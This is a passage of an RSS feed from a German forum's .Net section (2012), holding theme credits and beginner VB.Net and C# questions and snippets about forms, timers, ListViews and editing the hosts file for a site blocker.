<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Simple thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=683&amp;d=1379876232" border="0" alt="Name:  ss20110804_160849-ceaf0fbd49.png
Hits: 261
Größe:  5,9 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/k4gTfXqh" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Y thème</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=689&amp;d=1379876232" border="0" alt="Name:  vyqhi-3c3003c777.png
Hits: 246
Größe:  7,1 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<u>Source</u> :<br />
<br />
<a href="http://pastebin.com/EqXyaqWb" target="_blank" rel="nofollow">Pastebin</a>
</div>
</div>
</div><br />
<br />
<b><font color="Red"><font size="3"><u>Credit</u> </font></font></b>:<br />
<br />
<font color="Red">Aeonhack</font><br />
<font color="Blue"><br />
Tedd<br />
<br />
xZ3ROxPROJ3CTx<br />
<br />
AlphaSquad<br />
<br />
Perplexity<br />
<br />
Marvinn<br />
<br />
Hydrogen <br />
<br />
alecn1519<br />
<br />
Flux<br />
<br />
By AP<br />
<br />
¢a&#1103;&#1074;øn &#1171;&#953;&#1074;&#1108;&#1103;<br />
<br />
Immortal-&#8482;<br />
<br />
SoulZeh<br />
<br />
xZ3ROxPROJ3CTx<br />
<br />
hav0c1995<br />
<br />
ViolentReality</font><br />
<br />
<br />
<b>Wenn ihr ein Fehler hier findet, meldet diesen mir bitte umgehend per PN, Danke :)</b></div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=666&amp;stc=1&amp;d=1351807313" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=667&amp;stc=1&amp;d=1351808590" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=668&amp;stc=1&amp;d=1351808590" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=669&amp;stc=1&amp;d=1351808591" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=670&amp;stc=1&amp;d=1351808591" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=671&amp;stc=1&amp;d=1351808592" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=672&amp;stc=1&amp;d=1351808592" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=673&amp;stc=1&amp;d=1351808593" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=674&amp;stc=1&amp;d=1351808593" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=675&amp;stc=1&amp;d=1351808594" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=676&amp;stc=1&amp;d=1351808594" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=677&amp;stc=1&amp;d=1351808595" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=678&amp;stc=1&amp;d=1351808595" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=679&amp;stc=1&amp;d=1351808596" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=680&amp;stc=1&amp;d=1351808596" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=681&amp;stc=1&amp;d=1351808597" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=682&amp;stc=1&amp;d=1351808597" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=683&amp;stc=1&amp;d=1351808598" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=684&amp;stc=1&amp;d=1351808598" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=685&amp;stc=1&amp;d=1351808599" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=686&amp;stc=1&amp;d=1351808600" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=687&amp;stc=1&amp;d=1351808600" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=688&amp;stc=1&amp;d=1351808601" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=689&amp;stc=1&amp;d=1351808602" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=690&amp;stc=1&amp;d=1351808602" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=691&amp;stc=1&amp;d=1351808603" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=692&amp;stc=1&amp;d=1351808603" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/themes-purecode-2-0-17709</guid>
		</item>
		<item>
			<title><![CDATA[C# [Problem] Form unten Rechts anzeigen]]></title>
			<link>net-94/problem-form-unten-rechts-anzeigen-17490?goto=newpost</link>
			<pubDate>Tue, 23 Oct 2012 23:02:12 GMT</pubDate>
			<description>Schönen Guten Abend Ihr Lieben, 
 
 
ich Programmiere mit C# und habe da mal nen Problemchen und zwar, wie bekomme ich das die Form sich unten...</description>
			<content:encoded><![CDATA[<div>Schönen Guten Abend Ihr Lieben,<br />
<br />
<br />
ich Programmiere mit C# und habe da mal nen Problemchen und zwar, wie bekomme ich das die Form sich unten Rechts/Links anzeigt wenn sich die Form Öffnet!?<br />
<br />
Ich hoffe Ihr könnt mir da weiter helfen :)<br />
<br />
<br />
Mfg</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>AmJano</dc:creator>
			<guid isPermaLink="true">net-94/problem-form-unten-rechts-anzeigen-17490</guid>
		</item>
		<item>
			<title>VB.Net Fehler - Ungültige Konvertierung</title>
			<link>net-94/fehler-ungueltige-konvertierung-17476?goto=newpost</link>
			<pubDate>Tue, 23 Oct 2012 01:04:03 GMT</pubDate>
			<description>*IGNORIERT DEN TITEL - ANDERES PROBLEM:* 
 
Hey. 
 
Ich bin gerade dabei ein Programm zu erstellen womit man eine Seite sperren kann und wieder...</description>
			<content:encoded><![CDATA[<div><b><font size="3"><font color="#FF0000">IGNORIERT DEN TITEL - ANDERES PROBLEM:</font></font></b><br />
<br />
Hey.<br />
<br />
Ich bin gerade dabei ein Programm zu erstellen womit man eine Seite sperren kann und wieder entsperren kann. Das ganze läuft über die Windows &quot;Hosts&quot; - Datei.<br />
<br />
Sperren funktioniert wunderbar, beim entsperren passiert jedoch nichts.<br />
<br />
Code zum entsperren der Seite:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">Dim&nbsp;hostsfile&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;New&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">(</span><span style="color: #DD0000">"C:\Windows\System32\drivers\etc\hosts"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Dim&nbsp;hostscontent&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">IO</span><span style="color: #007700">.</span><span style="color: #0000BB">File</span><span style="color: #007700">.</span><span style="color: #0000BB">ReadAllText</span><span style="color: #007700">(</span><span style="color: #0000BB">hostsfile</span><span style="color: #007700">)<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">hostscontent</span><span style="color: #007700">.</span><span style="color: #0000BB">Remove</span><span style="color: #007700">(</span><span style="color: #DD0000">"127.0.0.1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"&nbsp;</span><span style="color: #007700">&amp;&nbsp;</span><span style="color: #0000BB">TextBoxX1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">&amp;&nbsp;</span><span style="color: #0000BB">vbNewLine</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">""</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">IO</span><span style="color: #007700">.</span><span style="color: #0000BB">File</span><span style="color: #007700">.</span><span style="color: #0000BB">WriteAllText</span><span style="color: #007700">(</span><span style="color: #DD0000">"C:\Windows\System32\drivers\etc\hosts"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">hostscontent</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;Sub&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Die Seite wird aber nicht aus der Datei entfernt.<br />
<br />
Weiß jemand woran das liegt?<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/fehler-ungueltige-konvertierung-17476</guid>
		</item>
		<item>
			<title>VB.Net Framework Version runterschrauben?</title>
			<link>net-94/framework-version-runterschrauben-17413?goto=newpost</link>
			<pubDate>Sat, 20 Oct 2012 21:45:03 GMT</pubDate>
			<description>Hey. 
 
Für mein Programm was ich mit VB 2010 erstellt habe braucht man .NET Framework 4.  
Habe aber mal gelesen das es auch sein kann das man...</description>
			<content:encoded><![CDATA[<div>Hey.<br />
<br />
Für mein Programm was ich mit VB 2010 erstellt habe braucht man .NET Framework 4. <br />
Habe aber mal gelesen das es auch sein kann das man Framework 4 garnicht braucht und es z.B. auf 3 runterschrauben kann?<br />
<br />
Geht das?<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/framework-version-runterschrauben-17413</guid>
		</item>
		<item>
			<title>VB.Net Sammelthread Codeschnipsel</title>
			<link>net-94/sammelthread-codeschnipsel-17297?goto=newpost</link>
			<pubDate>Tue, 16 Oct 2012 05:13:20 GMT</pubDate>
			<description>Moinsen, 
 
hier mal ein paar Codeschnispel vielleicht helfen sie dem  ein oder anderen,,,,, 
 
Button Text ändern 
Diesen Code kann man in...</description>
			<content:encoded><![CDATA[<div>Moinsen,<br />
<br />
hier mal ein paar Codeschnispel vielleicht helfen sie dem  ein oder anderen,,,,,<br />
<br />
Button Text ändern<br />
Diesen Code kann man in Verbindung mit dem 2.Code verwenden<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
Button1.Text = &quot;Hide&quot;<br />
End Sub</code><hr />
</div><br />
<br />
Bei Buttonklick Form vergrößern/verkleinern<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
Width = 114<br />
Height = 81<br />
End Sub</code><hr />
</div><br />
<br />
Textbox leeren lassen<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
TextBox1.Clear()<br />
End Sub</code><hr />
</div><br />
<br />
Richtextbox leeren lassen<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
Richtextbox1.Clear()<br />
End Sub</code><hr />
</div><br />
<br />
Listbox leeren lassen<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
ListBox1.Items.Clear()<br />
End Sub</code><hr />
</div><br />
<br />
<br />
Code für Linklabel<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub LinkLabel1_LinkClicked(ByVal sender As System.Object, ByVal e As System.Windows.Forms.LinkLabelLinkClickedEventArgs) Handles LinkLabel1.LinkClicked<br />
Process.Start(&quot;http://K-under.de&quot;)<br />
End Sub</code><hr />
</div><br />
<br />
<br />
Bestimmten Text in Clipboard<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
My.Computer.Clipboard.SetText(&quot;TEXT&quot;)<br />
End Sub</code><hr />
</div><br />
<br />
Textboxinhalt in Clipboard<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
My.Computer.Clipboard.SetText(Textbox1.Text)<br />
End Sub</code><hr />
</div><br />
<br />
<br />
Neue Zeile in Richtextbox<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
RichTextBox1.AppendText(vbnewline)</code><hr />
</div><br />
<br />
Richtextbox soll mitscrollen<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">RichTextBox1.ScrollToCaret()</code><hr />
</div><br />
<br />
Bestimmten Text auf Label setzten<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
Label1.Text = &quot;TEXT&quot;<br />
End Sub</code><hr />
</div><br />
<br />
<br />
Wenn man Enter drückt soll Textboxinhalt in Richtextbox gesendet werden<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub TextBox1_KeyDown(ByVal sender As System.Object, ByVal e As KeyEventArgs) Handles TextBox1.KeyDown<br />
If e.KeyCode = Keys.Enter Then<br />
RichTextBox1.AppendText(TextBox1.Text)<br />
End If<br />
End Sub</code><hr />
</div><br />
<br />
Code für Webbrowser1<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
Webbrowser1.Navigate(&quot;http://k-under.de&quot;)<br />
End Sub</code><hr />
</div><br />
Code für Webbrowser2<br />
Was ihr braucht: Button, Webbrowser &amp; Textbox<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"><br />
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
Webbrowser1.Navigate(Textbox1.Text)<br />
End Sub</code><hr />
</div><br />
<br />
<b>Da anscheinend einige nicth checken das die Quelle ich selber bin sage ich es gerne nochmal Quellenangabe: Skyter aka Scylla </b></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Skyter</dc:creator>
			<guid isPermaLink="true">net-94/sammelthread-codeschnipsel-17297</guid>
		</item>
		<item>
			<title>Vb6 mit Codejock</title>
			<link>net-94/vb6-mit-codejock-17296?goto=newpost</link>
			<pubDate>Tue, 16 Oct 2012 05:01:03 GMT</pubDate>
			<description>Hey Leute, 
 
vorab weiss nicht wirklich ob das hier richtige gepostet ist aber wusste nicht wo es anders sonst passen würde. 
 
 
Habe damals ein...</description>
			<content:encoded><![CDATA[<div>Hey Leute,<br />
<br />
vorab weiss nicht wirklich ob das hier richtige gepostet ist aber wusste nicht wo es anders sonst passen würde.<br />
<br />
<br />
Habe damals ein Code geschrieben und ein Tutorial wie man codejock mit vb6 verwenden kann( das Prinzip ist gleich deswegen wer programieren kann sollte keine Probleme haben das so umzu ändern damit es in der gewünschten Sprache klappt)<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">1.Oeffnet vb6 und startet ein projekt<br />
2.Speichert das projekt<br />
3.Ladet die komponente (c:/programme/codejack software/active x/suite pro version/bin/skinframework/<br />
4.zieht euch das neue symbol was links im tool menue ist auf die form<br />
5.Doppelklick auf der Form<br />
und dann bei Form_Load<br />
<br />
Dim Descriptions As SkinDescriptions<br />
&nbsp; &nbsp; Set Descriptions = SkinFramework1.EnumerateSkinDirectory(App.Path &amp; &quot;\&quot;, True)<br />
&nbsp; &nbsp; <br />
&nbsp; &nbsp; Dim Des As SkinDescription<br />
&nbsp; &nbsp; For Each Des In Descriptions<br />
&nbsp; &nbsp; &nbsp; &nbsp; Debug.Print Des.Name &amp; &quot; - &quot; &amp; Des.Path<br />
&nbsp; &nbsp; Next<br />
<br />
<br />
&nbsp; &nbsp; SkinFramework1.LoadSkin App.Path &amp; &quot;\Vista.cjstyles&quot;, &quot;&quot;<br />
&nbsp; &nbsp; SkinFramework1.ApplyWindow Me.hWnd<br />
&nbsp; &nbsp; SkinFramework1.ApplyOptions = SkinFramework.ApplyOptions Or xtpSkinApplyMetrics<br />
6.Nun muesst ihr noch den style speicher dort wir eurer projekt1.exe habt geht unter c:/programme/codejack software/active x/suite pro/samples/styles kopiert euch den style<br />
fertig<br />
<br />
Extra:<br />
&nbsp;SkinFramework1.LoadSkin App.Path &amp; &quot;\Vista.cjstyles<br />
bei Vista.cjstyles immer den namen schreiben von dem style den ihr haben wollt</code><hr />
</div>Wer codejock nicht kennen sollte es ist sowas womit ihr eure Form (Design vom Program) aufpimpen könnt.<br />
Mehr infos unter <a href="http://www.codejock.com/" target="_blank" rel="nofollow">User Interface Components and Controls for Visual C++ MFC, Active-X, COM and .NET WinForms</a>.<br />
<br />
<br />
Viel spaß damit.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Skyter</dc:creator>
			<guid isPermaLink="true">net-94/vb6-mit-codejock-17296</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [Suche] Visual Basic Design]]></title>
			<link>net-94/suche-visual-basic-design-17112?goto=newpost</link>
			<pubDate>Tue, 09 Oct 2012 18:31:39 GMT</pubDate>
			<description>Moin. 
 
Bin auf der Suche nach einem Design, bin mir nicht sicher ob es Pup ist und weiß leider den Namen nicht deshalb kann ich nicht suchen. Weiß...</description>
			<content:encoded><![CDATA[<div>Moin.<br />
<br />
Bin auf der Suche nach einem Design, bin mir nicht sicher ob es Pup ist und weiß leider den Namen nicht deshalb kann ich nicht suchen. Weiß nicht wie ich es genau beschreiben soll, war irgendwie glaßig :D<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/suche-visual-basic-design-17112</guid>
		</item>
		<item>
			<title>C# ListView Items in Array speichern</title>
			<link>net-94/listview-items-in-array-speichern-17103?goto=newpost</link>
			<pubDate>Tue, 09 Oct 2012 14:12:56 GMT</pubDate>
			<description>wHeeeeey ! 
Ich hab da mal eine Frage und zwar: Ich habe ein ListView mit vier Spalten. Nun möchte ich halt, dass wenn ich auf Button2 klicke, die...</description>
			<content:encoded><![CDATA[<div>wHeeeeey !<br />
Ich hab da mal eine Frage und zwar: Ich habe ein ListView mit vier Spalten. Nun möchte ich halt, dass wenn ich auf Button2 klicke, die ganzen Daten in einem Array gespeichert werden. Also Die erste Zeile in einem Array, dann die zweite Zeile in einem Array und so weiter. Das soll halt sooft gemacht werden, bis alle Zeilen, die mit irgendeinem Wert ausgefüllt wurden, jeweils in einem eigenen Array sind.<br />
Nur ich habe da 0 Plan, wie ich das angehen soll..<br />
<br />
Hier ein Screen zur Verdeutlichung. <br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<img src="https://u-labs.de/forum/attachment.php?attachmentid=380&amp;d=1379876200" border="0" alt="Name:  bspiz.png
Hits: 426
Größe:  24,1 KB" class="thumbnail" style="float:CONFIG" />
</div>
</div>
</div><br />
<br />
e: Bild hinzugefügt. Hat irgendwie nicht geklappt, kp. :)</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=380&amp;stc=1&amp;d=1349792122" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/listview-items-in-array-speichern-17103</guid>
		</item>
		<item>
			<title>VB.Net Warum funktioniert der Countdown nicht?</title>
			<link>net-94/warum-funktioniert-der-countdown-nicht-16869?goto=newpost</link>
			<pubDate>Fri, 28 Sep 2012 16:57:05 GMT</pubDate>
			<description><![CDATA[Moin. 
 
Habe in einem Button als Text "5" 
 
Nun möchte ich nachdem "0" erreicht wurde der Text zu "Öffnen" geändert wird. 
Jedoch zieht der nichts...]]></description>
			<content:encoded><![CDATA[<div>Moin.<br />
<br />
Habe in einem Button als Text &quot;5&quot;<br />
<br />
Nun möchte ich nachdem &quot;0&quot; erreicht wurde der Text zu &quot;Öffnen&quot; geändert wird.<br />
Jedoch zieht der nichts von der &quot;5&quot; ab.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;Timer1_Tick</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;Timer1</span><span style="color: #007700">.</span><span style="color: #0000BB">Tick<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">1<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">1<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">1<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">1<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">1<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">If&nbsp;</span><span style="color: #0000BB">Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"0"&nbsp;</span><span style="color: #0000BB">Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"Öffnen"<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Enabled&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">True<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;</span><span style="color: #007700">If<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Timer1</span><span style="color: #007700">.</span><span style="color: #0000BB">Stop</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;Sub&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Woran liegt das?<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/warum-funktioniert-der-countdown-nicht-16869</guid>
		</item>
		<item>
			<title>VB.Net TextBox Mouse Hover Info anzeigen?</title>
			<link>net-94/textbox-mouse-hover-info-anzeigen-16323?goto=newpost</link>
			<pubDate>Sun, 16 Sep 2012 01:22:53 GMT</pubDate>
			<description>Moin. 
 
Kann ich im MouseHover Event einer TextBox eine kleine Info anzeigen lassen? Sollte keine MessageBox sein, am besten sowas ähnliches wie die...</description>
			<content:encoded><![CDATA[<div>Moin.<br />
<br />
Kann ich im MouseHover Event einer TextBox eine kleine Info anzeigen lassen? Sollte keine MessageBox sein, am besten sowas ähnliches wie die Eigenschaft BalloonTip vom NotifyIcon.<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/textbox-mouse-hover-info-anzeigen-16323</guid>
		</item>
		<item>
			<title>VB.Net Account-Börse Download?!</title>
			<link>net-94/account-boerse-download-16309?goto=newpost</link>
			<pubDate>Sat, 15 Sep 2012 13:19:58 GMT</pubDate>
			<description>Moin, 
 
ich wollte ein Programm für den privatgebrauch schreiben, welches mir Datein automatisch nacheinander downloaded, 
